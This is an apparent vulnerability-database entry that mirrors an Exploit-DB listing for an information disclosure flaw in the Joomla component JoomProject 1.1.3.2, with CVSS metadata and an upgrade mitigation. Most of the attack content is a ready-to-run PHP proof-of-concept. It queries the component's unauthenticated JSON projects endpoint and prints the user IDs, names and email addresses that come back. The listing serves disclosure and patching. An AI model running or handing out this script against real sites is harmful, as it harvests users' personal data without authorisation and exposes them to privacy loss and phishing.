Joomla! Component JoomProject 1.1.3.2 - Information Disclosure

vendor:

JoomProject

by:

Ihsan Sencan

4.3

CVSS

MEDIUM

Information Disclosure

200

CWE

Product Name: JoomProject

Affected Version From: 1.1.3.2

Affected Version To: 1.1.3.2

Patch Exists: YES

Related CWE: N/A

CPE: a:joomboost:joomproject:1.1.3.2

Metasploit: N/A

Other Scripts: N/A

Platforms Tested: WiN7_x64/KaLiLinuX_x64

2019

Joomla! Component JoomProject 1.1.3.2 – Information Disclosure

A vulnerability in Joomla! Component JoomProject 1.1.3.2 allows an attacker to gain access to sensitive information such as user IDs, names, and emails. This is achieved by sending a specially crafted HTTP request to the vulnerable server, which will return a JSON response containing the sensitive information.

Mitigation:

Upgrade to the latest version of Joomla! Component JoomProject.

Source

Exploit-DB raw data:

# Exploit Title: Joomla! Component JoomProject 1.1.3.2 - Information Disclosure
# Dork: N/A
# Date: 2019-01-11
# Exploit Author: Ihsan Sencan
# Vendor Homepage: http://joomboost.com/
# Software Link: https://extensions.joomla.org/extensions/extension/clients-a-communities/project-a-task-management/joomproject/
# Version: 1.1.3.2
# Category: Webapps
# Tested on: WiN7_x64/KaLiLinuX_x64
# CVE: N/A

# POC: 
# 1) 
<?php
header ('Content-type: text/html; charset=UTF-8');
$url= "http://localhost/[PATH]/";
$p="index.php?option=com_jpprojects&view=projects&tmpl=component&format=json";
$url = file_get_contents($url.$p);
$l = json_decode($url, true);
if($l){
	echo "*-----------------------------*<br />";
foreach($l as $u){
	echo "[-] ID\n\n\n\n:\n" .$u['id']."<br />";
	echo "[-] Name\n\n:\n" .$u['author_name']."<br />";
	echo "[-] Email\n:\n" .$u['author_email']."<br />";
	echo "<br>";
}echo "*-----------------------------*";} 
else{echo "[-] No user";}
?>